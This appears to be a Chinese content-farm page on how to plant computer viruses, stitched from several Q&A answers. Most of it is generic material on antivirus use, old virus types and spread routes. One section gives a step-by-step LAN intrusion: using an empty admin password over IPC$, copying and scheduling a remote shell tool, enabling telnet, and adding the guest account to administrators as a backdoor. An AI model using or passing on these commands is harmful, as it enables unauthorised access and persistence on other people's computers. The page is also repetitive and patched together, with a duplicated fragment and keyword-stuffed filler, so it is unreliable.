如何将电脑病毒植入电脑(如何将电脑病毒植入电脑内)

系统教程0402

本篇文章给大家谈谈如何将电脑病毒植入电脑,以及如何将电脑病毒植入电脑内对应的知识点,希望对各位有所帮助,不要忘了收藏本站喔。 今天给各位分享如何将电脑病毒植入电脑的知识,其中也会对如何将电脑病毒植入电脑内进行解释,如果能碰巧解决你现在面临的问题,别忘了关注本站,现在开始吧!

本文目录一览:

如何给电脑植入病毒

最好不要传播病毒、盗号木马程序,恶意传播病毒和木马会污染互联网环境,保护大家上网的良好的环境。

1,要是问的电脑中毒了怎么杀毒还可以的,可以安装关杀毒软件杀毒,如腾讯电脑管家,东方微点等等都是不错的。

2,最重要的是预防病毒才是关键的,来路不明的未知文件,最好不要安装,很有可能是病毒或者木马。

3,还可以安装腾讯电脑管家等等软件,开启对电脑实时防护,就可以保护电脑安全运行,避免个人财产和隐私带来威胁了。

局域网内如何将病毒传到其他电脑?

用139端口入侵这个入侵。

局域网入侵步骤:

1、C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"   这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

2、 C:\copy srv.exe \\127.0.0.1\admin$   先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3. C:\net time \\127.0.0.1   查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe   用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)

5. C:\net time \\127.0.0.1 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99   这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。   虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$   用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:\WINNT\system32ntlm   输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)   为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes   将对方的Guest用户激活

11. C:\net user guest 1234   将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add   将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

电脑病毒是如何进入电脑的?

恶性程序码的类别中,电脑病毒和蠕虫是较具破坏力,因为它们有复制的能力,从而能够感染远方的系统。电脑病毒一般可以分成下列各类:

引导区电脑病毒

文件型电脑病毒

复合型电脑病毒

宏病毒

特洛伊/特洛伊木马

蠕虫

其他电脑病毒/恶性程序码的种类和制作技巧

引导区电脑病毒

90年代中期,最为流行的电脑病毒是引导区病毒,主要通过软盘在16位元磁盘操作系统(DOS)环境下传播。引导区病毒会感染软盘内的引导区及硬盘,而且也能够感染用户硬盘内的主引导区(MBR)。一但电脑中毒,每一个经受感染电脑读取过的软盘都会受到感染。

引导区电脑病毒是如此传播:隐藏在磁盘内,在系统文件启动以前电脑病毒已驻留在内存内。这样一来,电脑病毒就可完全控制DOS中断功能,以便进行病毒传播和破坏活动。那些设计在DOS或Windows3.1上执行的引导区病毒是不能够在新的电脑操作系统上传播,所以这类的电脑病毒已经比较罕见了。

典型例子:

Michelangelo是一种引导区病毒。它会感染引导区内的磁盘及硬盘内的MBR。当此电脑病毒常驻内存时,便会感染所有读取中及没有写入保护的磁盘。除此以外,Michelangelo会于3月6日当天删除受感染电脑内的所有文件。

文件型电脑病毒

文件型电脑病毒,又称寄生病毒,通常感染执行文件(.EXE),但是也有些会感染其它可执行文件,如DLL,SCR等等...每次执行受感染的文件时,电脑病毒便会发作:电脑病毒会将自己复制到其他可执行文件,并且继续执行原有的程序,以免被用户所察觉。

典型例子:

CIH会感染Windows95/98的.EXE文件,并在每月的26号发作日进行严重破坏。于每月的26号当日,此电脑病毒会试图把一些随机资料覆写在系统的硬盘,令该硬盘无法读取原有资料。此外,这病毒又会试图破坏FlashBIOS内的资料。

复合型电脑病毒

复合型电脑病毒具有引导区病毒和文件型病毒的双重特点。

宏病毒

与其他电脑病毒类型的分别是宏病毒是攻击数据文件而不是程序文件。

宏病毒专门针对特定的应用软件,可感染依附于某些应用软件内的宏指令,它可以很容易透过电子邮件附件、软盘、文件下载和群组软件等多种方式进行传播如MicrosoftWord和Excel。宏病毒采用程序语言撰写,例如VisualBasic或CorelDraw,而这些又是易于掌握的程序语言。宏病毒最先在1995年被发现,在不久后已成为最普遍的电脑病毒。

典型例子:

JulyKiller这个电脑病毒通过VB宏在MSWord97文件中传播。一但打开染毒文件,这病毒首先感染共用范本(normal.dot),从而导致其它被打开的文件一一遭到感染。此电脑病毒的破坏力严重。如果当月份是7月时,这病毒就会删除c:\的所有文件。

特洛伊/特洛伊木马

特洛伊或特洛伊木马是一个看似正当的程序,但事实上当执行时会进行一些恶性及不正当的活动。特洛伊可用作黑客工具去窃取用户的密码资料或破坏硬盘内的程序或数据。与电脑病毒的分别是特洛伊不会复制自己。它的传播技俩通常是诱骗电脑用户把特洛伊木马植入电脑内,例如通过电子邮件上的游戏附件等。

典型例子:

BackOrifice特洛伊木马于1998年发现,是一个Windows远程管理工具,让用户利用简单控制台或视窗应用程序,透过TCP/IP去远程遥控电脑。

蠕虫

蠕虫是另一种能自行复制和经由网络扩散的程序。它跟电脑病毒有些不同,电脑病毒通常会专注感染其它程序,但蠕虫是专注于利用网络去扩散。从定义上,电脑病毒和蠕虫是非不可并存的。随着互联网的普及,蠕虫利用电子邮件系统去复制,例如把自己隐藏于附件并于短时间内电子邮件予多个用户。有些蠕虫(如CodeRed),更会利用软件上的漏洞去扩散和进行破坏。

典型例子:

于1999年6月发现的Worm.ExploreZip是一个可复制自己的蠕虫。当执行时,它会把自己隐藏在附件,经电子邮件传送予通讯录内的收件人。在Windows环境下,若用户开启附件,就会自动执行蠕虫。在Windows95/98环境下,此蠕虫以Explore.exe为名,把自己复制到C:\windows\system目录,以及更改WIN.INI文件,以便系统每次启动时便会自动执行蠕虫。

管理工具,让用户利用简单控制台或视窗应用程序,透过TCP/IP去远程遥控电脑。

其他病毒/恶性程序码的种类和制作技巧

电脑病毒及防毒科技不断变更。因应用户转移至新的平台或新的科技,电脑病毒编写者会试图研制及传播新的电脑病毒。例如,在Java及LotusNotes平台上的电脑病毒已在近几年出现,其中首只Java病毒(Java.StrangeBrew)是在一九九八年九月上被发现的。所以,我们不应对于有关电脑病毒将会侵占新的电脑平台的报导,例如Macromedia、个人PDA、流动仪器或.NET等等而感到惊讶。

以下是现今电脑病毒普遍所采用的技巧:

ActiveContent

VBScript病毒

对于电脑病毒的发展,以下有一于趋势预计:

与软件上的保安漏洞更多结合

采用多种途径去散播

可感染多种不同的电脑平台

其实,以上所提出的预测己经发现在现今一些先进的电脑病毒中。例如在Nimda中,它会使用IIS和IE的保安漏洞去感染服务器和工作站。Nimda这种复杂的电脑病毒还采用多种途径去散播,其中包括电子邮件、网络上的共用资源、由CodeRedII所留下的后门、和通过浏览已感染了Nimda的服务器上的网页。此外,可以同时感染Windows和Linux的电脑病毒,已经在2001年被首次发现。

在启动项里咯,一些.DLL .com .exe 文件

一是看启动项和任务进程

用杀毒软件和一些流氓软件清理工具(比方:windows清理助手等)来查杀,别一个就是看注册表了

电脑病毒入侵方式有哪些

电脑病毒的入侵方式有很多很多!你知道多少种呢!我带你一起去了解!

电脑病毒入侵方式:

(1)感染速度快

在单机环境下,病毒只能通过介质从一台计算机带到另一台,而在网络中则可以通过网络通讯机制进行迅速扩散。根据测定,在网络正常工作情况下,只要有一台工作站有病毒,就可在几十分钟内将网上的数百台计算机全部感染。

(2)扩散面广

由于病毒在网络中扩散非常快,扩散范围很大,不但能迅速传染局域网内所有计算机,还能通过远程工作站将病毒在一瞬间传播到千里之外。

(3)传播的形式复杂多样

计算机病毒在网络上一般是通过"工作站"到"服务器"到"工作站"的途径进行传播的,但现在病毒技术进步了不少,传播的形式复杂多样。

(4)难于彻底清除e.

单机上的计算机病毒有时可以通过带毒文件来解决。低级格式化硬盘等 措施 能将病毒彻底清除。而网络中只要有一台工作站未能清除干净,就可使整个网络重新被病毒感染,甚至刚刚完成杀毒工作的一台工作站,就有可能被网上另一台带毒工作站所感染。因此,仅对工作站进行杀毒,并不能解决病毒对网络的危害。

(5)破坏性大

网络病毒将直接影响网络的工作,轻则降低速度,影响工作效率,重则使网络崩溃,破坏服务器信息,使多年工作毁于一旦。

(6)可激发性

网络病毒激发的条件多样化,可以是内部时钟、系统的日期和用户名,也可以是网络的一次通信等。一个病毒程序可以按照病毒设计者的要求,在某个工作站上激发并发出攻击。

(7)潜在性

网络一旦感染了病毒,即使病毒已被清除,其潜在的危险性也是巨大的。根据统计,病毒在网络上被清除后,85%的网络在30天内会被再次感染。

例如尼姆达病毒,会搜索本地网络的文件共享,无论是文件服务器还是终端客户机,一旦找到,便安装一个隐藏文件,名为Riched20.DLL到每一个包含"DOC"和"eml"文件的目录中,当用户通过Word、写字板、Outlook打开"DOC"和"eml"文档时,这些应用程序将执行Riched20.DLL文件,从而使机器被感染,同时该病毒还可以感染远程服务器被启动的文件。带有尼姆达病毒的电子邮件,不需你打开附件,只要阅读或预览了带病毒的邮件,就会继续发送带毒邮件给你通讯簿里的朋友。

怎样给电脑植入病毒

计算机病毒的传播途径主要通过文件复制、文件传送、文件执行等方式进行,文件复制与文件传送需要传输媒介,文件执行则是病毒感染的必然途径(Word、Excel等宏病毒通过Word、Excel调用间接地执行),因此,病毒传播与文件传输媒体的变化有着直接的关系。

(1)软盘传播:通过移动存储没备来传播,这些设备主要包括软盘、光盘、u盘等在移动存储设备中,软盘是使用最广泛、移动最频繁的存储介质。

(2)硬件设备传播:通过不可移动的计算机硬件设备进行传播,这些设备通常有计算机的专用的ASIC芯片和硬盘等。由于带病毒的硬盘在本地或移到其他地方使用、维修等,将干净的硬盘感染并再扩散。

(3)网络传播:目前通过网络应用(如电子邮件、文件下载、网页浏览)进行传播已经成为计算机病毒传播的主要方式。

(4)BBs电子布告栏(BBs):因为上站容易、投资少,因此深受大众用户的喜爱。由于BBs站一般没有严格的安全管理,也无任何限制,这样就给一些病毒程序编写者提供了传播病毒的场所。

扩展资料:

计算机病毒对微型机系统的危害:

(1)破坏磁盘的文件分配表或目录区,使用户磁盘上的信息丢失。

(2)删除软、硬盘上可执行文件或覆盖文件。

(3)将非法数据写DOS内存参数区,引起系统崩溃。

(4)修改或破坏文件和数据。

(5)影响内存常驻程序的正常执行。

(6)在磁盘上标记虚假的坏簇,从而破坏有关的程序或数据。

(7)更改或重新写入磁盘的卷标号。

(8)对可执行文件反复传染拷贝,造成磁盘存贮空间减少,并影响系统运行效率。

(9)对整个磁盘进行特定的格式化,破坏全盘的数据。

(10)使系统空挂,造成显示器键盘被封锁的状态。

关于如何将电脑病毒植入电脑和如何将电脑病毒植入电脑内的介绍到此就结束了,不知道你从中找到你需要的信息了吗 ?如果你还想了解更多这方面的信息,记得收藏关注本站。 如何将电脑病毒植入电脑的介绍就聊到这里吧,感谢你花时间阅读本站内容,更多关于如何将电脑病毒植入电脑内、如何将电脑病毒植入电脑的信息别忘了在本站进行查找喔。